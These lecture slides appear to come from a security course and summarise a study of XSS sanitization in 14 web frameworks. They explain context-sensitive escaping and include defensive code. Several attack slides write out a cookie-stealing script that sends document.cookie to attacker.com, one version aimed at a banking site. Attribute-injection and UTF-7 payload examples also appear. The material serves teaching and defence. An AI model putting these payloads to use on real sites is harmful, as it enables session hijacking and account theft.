THE BROKEN WEB A Systematic Analysis of XSS Sanitization in Web Application Frameworks
Executive summary • Web page processing analyzed in detail • Sanitization is quite complex • Context sensitive • 14 web frameworks analyzed • None handle sanitization properly • In some cases they give a false sense of security because the sanitization algorithm is wrong
HTTP background Basic HTTP operation • File on the server, www.example.com/sample.html: <h1>Sample file</h1> <p>This is a sample</p> • 1. Client sends request to server: GET www.example.com/sample.html • 2. Server locates and sends back file • 3. Client displays file: Sample file, This is a sample
HTTP background Server side scripting • sample.php: <?php echo '<h1>Sample file</h1>'; echo '<p>This is a sample</p>'; ?> • 1. Client sends request: GET www.example.com/sample.php • 2. Server executes script • 3. Server returns generated file: <h1>Sample file</h1><p>This is a sample</p> • 4. Client displays file: Sample file, This is a sample
HTTP background Form management • Form shown to the user: Please send me your important financial information: • Name: Mr. Dummy • Soc: 234-23-5555 • Credit card number: 1234-1234-1234-1234 • SUBMIT • 1. User fills in fields and presses 'Submit' • 2. Client sends data to server: POST www.example.com/sample.php with form data name=Mr.Dummy&soc=234-23-5555&credit=1234-1234-1234-1234 • 3. Server executes script, sample.php: <?php /* save data somewhere */ … echo '<p>Now I own you.</p>'; ?> • 4. Server sends response page to client: Now I own you.
HTTP background Client side scripting <html> <body> <h1>My First Web Page</h1> <script type="text/javascript"> document.write("<p>" + Date() + "</p>"); </script> </body> </html>
HTTP background Client side scripting <html> <body> <h1>My First Web Page</h1> <p>Tue Feb 28 2012 14:28:07 GMT-0500 (EST)</p> </body> </html>
HTTP background Client side scripting My First Web Page Tue Feb 28 2012 14:28:07 GMT-0500 (EST)
XSS attack Server side code prints text entered by a user in an earlier session. Consider this code: • <?php echo '<p>Note from '.$user.'</p>'; echo '<p>'.$note.'</p>'; ?> Suppose $note contains <script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script> The sky is falling.
XSS attack The result is that the following is sent to your browser: • <p>Note from Mr. Apocalypse</p> • <p> • <script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling. • </p>
XSS attack Your browser displays the following: • Note from Mr. Apocalypse • [img] The sky is falling. The attacker now has your cookie, because your browser requested the image from attacker.com with the cookie in the URL.
XSS attack The attacker simply needed to enter this script on the screen used to post the note. • Logged in as: Mr. Apocalypse • Text of message to post: • <script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling. Any website that echoes user input back without sanitizing it can be used for an XSS attack.
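XSS attack • The following, placed on a page the victim visits, can be used to obtain the cookie for your bank account: <script>document.location='http://banking.com/search?name=<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>'</script> • In practice the inner script would be URL-encoded so that its </script> does not end the outer script.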
Sanitization One solution is to escape sensitive characters: <script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script> becomes &lt;script&gt;document.write(&quot;&lt;img src=http://attacker.com/&quot; + document.cookie + &quot;&gt;&quot;)&lt;/script&gt; Problem: sanitization needs to be done in a context-sensitive manner, and the rules are very complex
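The escaping step on this slide can be sketched in a few lines. This is a minimal illustration rather than any framework's actual sanitizer; the helper name `escapeHtml` and the choice of five escaped characters are assumptions made for the example.

```javascript
// Hypothetical helper: replace the characters that are significant in
// HTML text with their entity equivalents.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// The note from the attack slides, escaped before being echoed into <p>...</p>.
const note =
  '<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>';
const safeNote = escapeHtml(note);
console.log('<p>' + safeNote + '</p>');
```

The escaped note contains no literal angle brackets, so the browser shows it as text instead of running it. This only covers the plain HTML text context; the challenges that follow show why that is not enough.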
Challenge 1: context sensitivity Consider this code: echo '<p>'.$note.'</p>'; Here one can replace '<' with &lt; and '>' with &gt; to block attacks. However consider: echo "<img src='".$url."'>"; Consider the following url: picture.jpg' onLoad='document.location=… It contains no < or >, yet its quote closes the src attribute and adds an onLoad handler.
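A small sketch of why the angle-bracket rule fails inside an attribute, assuming the src attribute is single-quoted. Both function names are hypothetical, and `alert(1)` stands in for the elided payload on the slide.

```javascript
// Naive sanitizer: escapes only angle brackets, which is enough for
// plain HTML text but not for attribute values.
function escapeAngleBrackets(untrusted) {
  return String(untrusted).replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Hypothetical attribute-context sanitizer: also escapes quotes and
// ampersands so the value cannot close the attribute it sits in.
function escapeHtmlAttribute(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// alert(1) is a stand-in for the attacker's real handler code.
const url = "picture.jpg' onLoad='alert(1)";

const unsafeTag = "<img src='" + escapeAngleBrackets(url) + "'>";
const saferTag = "<img src='" + escapeHtmlAttribute(url) + "'>";

console.log(unsafeTag); // the onLoad attribute survives
console.log(saferTag);  // the quotes are encoded, so src stays one value
```

Even the attribute escaper is not a complete answer for URLs: a value such as a javascript: URL contains no special characters at all, so URL attributes also need scheme validation.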
Challenge 2: Sanitizing nested contexts Consider this piece of PHP code: echo '<script> var x = '.$UNTRUSTED_DATA.'...</script>'; The untrusted data sits in a Javascript context nested inside an HTML context, so one needs to block both a </script> and a ' to prevent attacks
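One way to handle both contexts at once is to emit the value as a quoted Javascript string in which every risky character is written as a \uXXXX escape. The sketch below assumes the value is placed between single quotes; `escapeJsString` is a hypothetical helper, not a function from any of the frameworks studied.

```javascript
// Hypothetical helper: make a value safe to place between quotes in a
// JavaScript string that itself sits inside an HTML <script> block.
// Quotes and backslashes would break out of the string; <, > and & would
// let "</script>" or entities affect the surrounding HTML.
function escapeJsString(untrusted) {
  return String(untrusted).replace(
    /[\\'"<>&\u2028\u2029\n\r]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

const untrusted = "'; alert(1); //</script><script>alert(2)</script>";
const page = "<script> var x = '" + escapeJsString(untrusted) + "'; </script>";

console.log(page);
```

The only `</script>` left in the output is the one written by the template, and the string literal still evaluates to the original text.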
Challenge 3: Browser transductions Consider: <div class='comment-box' onclick='displayComment("UNTRUSTED",this)'> ... hidden comment ... </div> Even if every " character in the untrusted text is replaced with &quot;, the HTML 5 parser decodes the entity before passing the attribute value to Javascript, so the quote reappears in the script.
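The decoding step can be modelled outside a browser. In the sketch below, `decodeHtmlEntities` is a deliberately simplified stand-in for what the HTML parser does to an attribute value, and `stealCookies` is a made-up attacker function; neither comes from the paper.

```javascript
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Simplified model of the browser: entities in an attribute value are
// decoded before the value is handed to the JavaScript engine.
function decodeHtmlEntities(s) {
  const map = { quot: '"', '#39': "'", lt: '<', gt: '>', amp: '&' };
  return s.replace(/&(quot|#39|lt|gt|amp);/g, (m, name) => map[name]);
}

function escapeJsString(s) {
  return String(s).replace(
    /[\\'"<>&\u2028\u2029\n\r]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

const untrusted = '"); stealCookies(); ("';

// HTML escaping alone: the browser undoes it before the script runs.
const seenAfterHtmlOnly = decodeHtmlEntities(escapeHtml(untrusted));

// JavaScript-escape first, then HTML-escape: after the browser's decoding
// step the value is still a safely escaped string literal body.
const seenAfterNested = decodeHtmlEntities(escapeHtml(escapeJsString(untrusted)));

console.log(seenAfterHtmlOnly === untrusted); // true: the quotes are back
console.log(seenAfterNested);
```

The order matters: the innermost context (the Javascript string) is escaped first and the outermost (the HTML attribute) last, mirroring the order in which the browser peels the layers off.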
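Challenge 4: Dynamic code Consider this program: function foo(untrusted) { document.write("<input onclick='foo(" + untrusted + ")' >"); } Evaluating it generates HTML that calls the function again on each click, so the untrusted value is re-parsed as HTML and as Javascript at run time, after any server-side sanitization has already happened.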
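Challenge 5: Character set issues • +ADw- maps to < in UTF-7 • A sanitizer that looks only for a literal < misses it if the browser interprets the page as UTF-7, so the sanitizer needs to recognize the character set conversion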
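The mapping can be checked by hand: in UTF-7, the text between + and - is base64-encoded UTF-16BE. The decoder below is a minimal sketch written for this example (it ignores several corner cases of the encoding) and relies on Node's `Buffer` for the base64 step.

```javascript
// Minimal UTF-7 decoder sketch: handles "+<base64>-" runs and the "+-"
// escape for a literal plus sign. Not a complete implementation.
function decodeUtf7(input) {
  return input.replace(/\+([A-Za-z0-9+/]*)-/g, (match, b64) => {
    if (b64 === '') return '+';
    const bytes = Buffer.from(b64, 'base64');
    let out = '';
    // Each pair of bytes is one UTF-16BE code unit.
    for (let i = 0; i + 1 < bytes.length; i += 2) {
      out += String.fromCharCode(bytes.readUInt16BE(i));
    }
    return out;
  });
}

const payload = '+ADw-script+AD4-alert(1)+ADw-/script+AD4-';

console.log(payload.includes('<')); // false: nothing for a naive filter to escape
console.log(decodeUtf7(payload));   // <script>alert(1)</script>
```

A filter that scans the raw bytes for `<` finds nothing to escape, which is why the response's declared character set and the sanitizer's assumptions have to agree.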
Challenge 6: everything else • MIME based XSS • Browser bugs • Capability leaks • Parsing inconsistencies • Browser extensions • Adobe Flash is fairly buggy
Evaluation of web frameworks and applications • Subjects • 14 popular web application frameworks • 8 popular PHP applications • Evaluation • Auto-sanitization and/or sanitization libraries • Dynamic sanitization handling
Auto sanitization • 7 of 14 support auto sanitization • 4 of these 7 perform context-insensitive sanitization, which is inherently unsafe • 14.8%-33.6% of output sinks fail to be protected by auto sanitization in 10 popular Django applications
Context sensitive sanitization • Performed by 3 of 7 frameworks • GWT, Google Clearsilver, and Google Ctemplate • Involved a runtime parser that checked the context and applied the appropriate sanitization function • User needs to mark untrusted variables • No detailed analysis of reliability • I assume they worked reasonably well
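The idea of choosing a sanitizer by context can be sketched as a dispatch table. This is a simplification: the three frameworks above infer the context with a runtime parser, whereas here the caller labels it by hand. All names (`SANITIZERS`, `untrusted`, `render`) are hypothetical.

```javascript
// One sanitizer per output context.
const SANITIZERS = {
  htmlText: (s) =>
    String(s).replace(/[&<>]/g, (ch) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;' }[ch])),
  htmlAttribute: (s) =>
    String(s).replace(/[&<>"']/g, (ch) =>
      ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[ch])),
  jsString: (s) =>
    String(s).replace(/[\\'"<>&\u2028\u2029\n\r]/g, (ch) =>
      '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')),
};

// Mark a value as untrusted and record the context it will be printed in.
function untrusted(value, context) {
  if (!Object.prototype.hasOwnProperty.call(SANITIZERS, context)) {
    throw new Error('No sanitizer for context: ' + context);
  }
  return { value, context };
}

// Template tag: every hole must be a marked value, and is sanitized with
// the function that matches its context.
function render(strings, ...holes) {
  let out = strings[0];
  holes.forEach((hole, i) => {
    if (!hole || typeof hole.context !== 'string') {
      throw new Error('Unmarked value in template hole ' + i);
    }
    out += SANITIZERS[hole.context](hole.value) + strings[i + 1];
  });
  return out;
}

const html = render`<p title='${untrusted("it's", 'htmlAttribute')}'>${untrusted('<b>hi</b>', 'htmlText')}</p>`;
console.log(html);
```

Refusing unmarked values makes a forgotten variable fail loudly instead of being printed raw, which addresses the "variables missed" problem of manual sanitization.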
Manual sanitization • Prone to error • Variables missed • Wrong sanitization function used
Dynamic code evaluation • Perform appropriate runtime checks before printing untrusted strings • Generally not supported by frameworks • Four frameworks provided static sanitization of untrusted strings within the context of JavaScript constants
DOM based errors • JavaScript can actually reference the content of a web page <h1>This page changes itself</h1> <a name="xxx">Original content</a> <script> document.anchors[0].innerHTML="New content"; </script>
DOM based errors • JavaScript can actually reference the content of a web page <h1>This page changes itself</h1> <a name="xxx">New content</a> <script> document.anchors[0].innerHTML="New content"; </script>
DOM based errors • Consider this code: text = element.getAttribute('title'); // ... elided ... desc = create_element('span', 'bottom'); desc.innerHTML = text; tooltip.appendChild(desc); This code reads an attribute from the HTML, which removes its escaping, and reinserts the text elsewhere as HTML. To avoid the bug: use innerText to write or innerHTML to read
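A sketch of the "write as text" fix. It uses the standard `textContent` property, which behaves like innerText for this purpose, and replaces the application's own `create_element` helper with the standard `createElement`; the function name `addTooltipText` and the `doc` parameter are assumptions made so the logic can be exercised outside a browser.

```javascript
// Copy an element's title into a new <span> inside the tooltip, writing it
// as text so the browser never parses it as markup.
// `doc` is normally the global `document`.
function addTooltipText(element, tooltip, doc) {
  const text = element.getAttribute('title'); // already entity-decoded
  const desc = doc.createElement('span');
  desc.textContent = text;                    // not desc.innerHTML = text
  tooltip.appendChild(desc);
  return desc;
}
```

In a page this would be called as `addTooltipText(element, tooltip, document)`. A title such as `<img src=x onerror=alert(1)>` then appears literally in the tooltip instead of creating an image element.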
DOM based errors • Ignored by frameworks • Cause many XSS vulnerabilities
Expressiveness of contexts in web applications • 8 PHP applications analyzed • 19 to 532 KLOC • All applications emit untrusted data into all contexts • Applications sometimes employ different sanitizers for the same context • General conclusion: frameworks do not provide sufficient sanitization support
Manual sanitization expressiveness • 9 of 14 frameworks do not support contexts other than the generic HTML • 4 provided sanitizers for JavaScript string context • 1 framework provided a sanitizer for JavaScript number and boolean contexts • None allow for sanitization of JavaScript code • Only one framework allowed customization of the sanitizer within a context; the others had a pre-packaged sanitizer for all contexts
Correctness of sanitizers • Sanitizers prone to error • In frameworks they usually work on a “whitelist” model in which only structures following specific patterns are allowed • One framework uses a “blacklist” model in which specific strings are forbidden • Frameworks rely on canonical form into which all output is formatted to simplify sanitizers • The authors conclude that the “whitelist” approach should be researched. The “blacklist” approach is too error prone.
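The difference between the two models shows up even on a tiny example. Both validators below are hypothetical and intentionally simple; the whitelist pattern is far stricter than a real application would want and is only meant to show the shape of the approach.

```javascript
// "Blacklist" model: reject input containing a known-bad string.
function blacklistUrl(url) {
  return !url.includes('javascript:');
}

// "Whitelist" model: accept only input that matches a known-good pattern,
// here an http(s) URL with a plain host and path.
function whitelistUrl(url) {
  return /^https?:\/\/[A-Za-z0-9.-]+(\/[A-Za-z0-9._~\/-]*)?$/.test(url);
}

// Browsers treat the URL scheme case-insensitively, so this variant still
// runs script when used as a link target.
const attack = 'JaVaScRiPt:alert(1)';

console.log(blacklistUrl(attack)); // true: the blacklist lets it through
console.log(whitelistUrl(attack)); // false: it does not match the pattern
console.log(whitelistUrl('http://www.example.com/sample.html')); // true
```

The blacklist has to anticipate every spelling an attacker might use, while the whitelist only has to describe what legitimate input looks like.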
Related work • XSS analysis and defense • Server side code errors • JavaScript code errors • Research identifies vulnerabilities • Untrusted data showing up in output • Improper sanitization • Server side solutions • BLUEPRINT, SCRIPTGARD, XSS-GUARD • Formalize web model to design sanitizers • Client side • XSS-Auditor • Analyze browser reference patterns to try to identify attacks • Does not separate trusted and untrusted data • Studies in sanitizer correctness • Manual process of adding sanitization is error prone • None provide a good underlying model for sanitizers • Taint tracking and security typed languages
Paper’s conclusions • Current frameworks do not properly manage sanitization • The paper suggests a future direction of producing a formal model of the browser’s behavior
Some later work • Saxena developed PHP analysis tools • Model checker: symbolic execution of PHP to try to find dangerous code • Static analysis: tries to identify and incorporate sanitizers based on the context of a print • Probably the better approach • Needs to be integrated with some sort of dynamic analysis
Discussion questions • What is the best approach for solving XSS? • In addition to technical issues, what practical issues need to be addressed to get a solution deployed? For example, asking everyone to rewrite their PHP code is going to be difficult. • Should the government get involved in regulating web sites to make sure basic protection standards are upheld?
XSS attack game • 2 teams • Source code available from www.cs.jhu.edu/~roe • Look for $_GET and $_POST variables for user input • Use MAMP to run